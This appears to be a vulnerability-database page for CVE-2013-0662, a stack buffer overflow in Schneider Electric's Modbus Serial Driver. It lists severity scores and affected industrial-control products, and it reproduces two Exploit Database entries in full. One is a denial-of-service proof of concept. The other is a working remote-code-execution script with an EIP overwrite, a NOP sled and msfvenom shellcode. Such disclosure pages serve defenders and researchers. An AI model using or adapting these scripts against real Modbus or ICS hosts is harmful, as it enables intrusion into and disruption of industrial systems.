Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Multiple stack-based buffer overflows in ModbusDrv.exe in Schneider Electric Modbus Serial Driver 1.10 through 3.2 allow remote attackers to execute arbitrary code via a large buffer-size value in a Modbus Application Header.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Out-of-bounds Write The product writes data past the end, or before the beginning, of the intended buffer. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 45219
Publication date : 2018-08-19 22h00 +00:00
Author : Alejandro Parodi
EDB Verified : No
# Title: SEIG Modbus 3.4 - Denial of Service (PoC)
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows7 x86
# CVE: CVE-2013-0662
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
import socket
import struct
import time
ip = "192.168.127.137"
port = 27700
con = (ip, port)
header_padding = "\x00\xAA"
header_buffer_size = "\xFF\xFF"
header_recv_len = "\x08\xDD" #(header_buffer_size + 1 en el ultimo byte por que se le resta uno)
header_end = "\xFF"
header = header_padding + header_buffer_size + header_recv_len + header_end
message = "\x00\x64" + "A" * 2267
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(header)
s.send(message)
Exploit Database EDB-ID : 45220
Publication date : 2018-08-19 22h00 +00:00
Author : Alejandro Parodi
EDB Verified : No
# Title: SEIG Modbus 3.4 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows XP SP3
# CVE: CVE-2013-0662
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
import socket
import struct
ip = "192.168.127.138"
port = 27700
con = (ip, port)
####### MESSAGE ##########
message_header = "\x00\x64"
message_buffer = "A" * 0x5dc
eip = struct.pack("<I", 0x7C9C167D)
# Shellcode generated with:
# msfvenom -a x86 --platform windows -p windows/exec cmd=calc -e x86/xor_call4 -f python
# Shellcode Size: 189 bytes
nopsleed = "\x90" * 100 # \x90 bad char bypass
shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shellcode += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shellcode += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shellcode += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shellcode += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shellcode += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shellcode += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shellcode += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shellcode += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shellcode += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shellcode += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
shellcode += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
shellcode += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
shellcode += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
shellcode += "\xff\xd5\x63\x61\x6c\x63\x00"
message = message_header + message_buffer + eip + nopsleed + shellcode
print "Message Len: " + hex(len(message)) + " bytes"
##########################
######## PKG HEADER ######
header_padding = "\x42\x42"
header_buf_size = "\xFF\xFF"
header_recv_len = struct.pack(">H", len(message))
header_end = "\x44"
header = header_padding + header_buf_size + header_recv_len + header_end
##########################
######## CRAFTING PAYLOAD ########
payload = header + message
print "Package Len: "+hex(len(payload)) + " bytes"
##################################
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(payload)
Products Mentioned
Configuraton 0
Schneider-electric>>Concept >> Version To (including) 2.6
- Schneider-electric>>Concept >> Version 2.6 (Open CPE detail)
Schneider-electric>>Modbus_serial_driver >> Version 1.10
- Schneider-electric>>Modbus_serial_driver >> Version 1.10 (Open CPE detail)
Schneider-electric>>Modbus_serial_driver >> Version 2.2
- Schneider-electric>>Modbus_serial_driver >> Version 2.2 (Open CPE detail)
Schneider-electric>>Modbus_serial_driver >> Version 3.2
- Schneider-electric>>Modbus_serial_driver >> Version 3.2 (Open CPE detail)
Schneider-electric>>Modbuscommdtm_sl >> Version To (including) 2.1.2
- Schneider-electric>>Modbuscommdtm_sl >> Version 2.1.2 (Open CPE detail)
Schneider-electric>>Opc_factory_server >> Version To (including) 3.5.0
- Schneider-electric>>Opc_factory_server >> Version 3.5 (Open CPE detail)
- Schneider-electric>>Opc_factory_server >> Version 3.5.0 (Open CPE detail)
Schneider-electric>>Opc_factory_server >> Version 3.34
- Schneider-electric>>Opc_factory_server >> Version 3.34 (Open CPE detail)
Schneider-electric>>Opc_factory_server >> Version 3.35
- Schneider-electric>>Opc_factory_server >> Version 3.35 (Open CPE detail)
Schneider-electric>>Pl7 >> Version To (including) 4.5
- Schneider-electric>>Pl7 >> Version 4.5 (Open CPE detail)
Schneider-electric>>Powersuite >> Version To (including) 2.6
- Schneider-electric>>Powersuite >> Version 2.6 (Open CPE detail)
Schneider-electric>>Sft2841 >> Version To (including) 14.0
- Schneider-electric>>Sft2841 >> Version 13.1 (Open CPE detail)
- Schneider-electric>>Sft2841 >> Version 14.0 (Open CPE detail)
Schneider-electric>>Sft2841 >> Version 13.1
- Schneider-electric>>Sft2841 >> Version 13.1 (Open CPE detail)
Schneider-electric>>Somachine >> Version To (including) 3.1
- Schneider-electric>>Somachine >> Version - (Open CPE detail)
- Schneider-electric>>Somachine >> Version 1.4 (Open CPE detail)
- Schneider-electric>>Somachine >> Version 2.0 (Open CPE detail)
- Schneider-electric>>Somachine >> Version 3.0 (Open CPE detail)
- Schneider-electric>>Somachine >> Version 3.0 (Open CPE detail)
- Schneider-electric>>Somachine >> Version 3.1 (Open CPE detail)
Schneider-electric>>Somachine >> Version 2.0
- Schneider-electric>>Somachine >> Version 2.0 (Open CPE detail)
Schneider-electric>>Somachine >> Version 3.0
- Schneider-electric>>Somachine >> Version 3.0 (Open CPE detail)
Schneider-electric>>Somove >> Version To (including) 1.7
- Schneider-electric>>Somove >> Version - (Open CPE detail)
- Schneider-electric>>Somove >> Version 1.7 (Open CPE detail)
Schneider-electric>>Twidosuite >> Version To (including) 2.31.04
- Schneider-electric>>Twidosuite >> Version 2.31.04 (Open CPE detail)
Schneider-electric>>Unity_pro >> Version To (including) 7.0
- Schneider-electric>>Unity_pro >> Version 6.0 (Open CPE detail)
- Schneider-electric>>Unity_pro >> Version 7.0 (Open CPE detail)
Schneider-electric>>Unity_pro >> Version 6.0
- Schneider-electric>>Unity_pro >> Version 6.0 (Open CPE detail)
Schneider-electric>>Unityloader >> Version To (including) 2.3
- Schneider-electric>>Unityloader >> Version 2.3 (Open CPE detail)
Schneider_electric>>Somachine >> Version 3.0
References
http://download.schneider-electric.com/files?p_Doc_Ref=SEVD%202013-070-01
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
2025©
tesweb SA
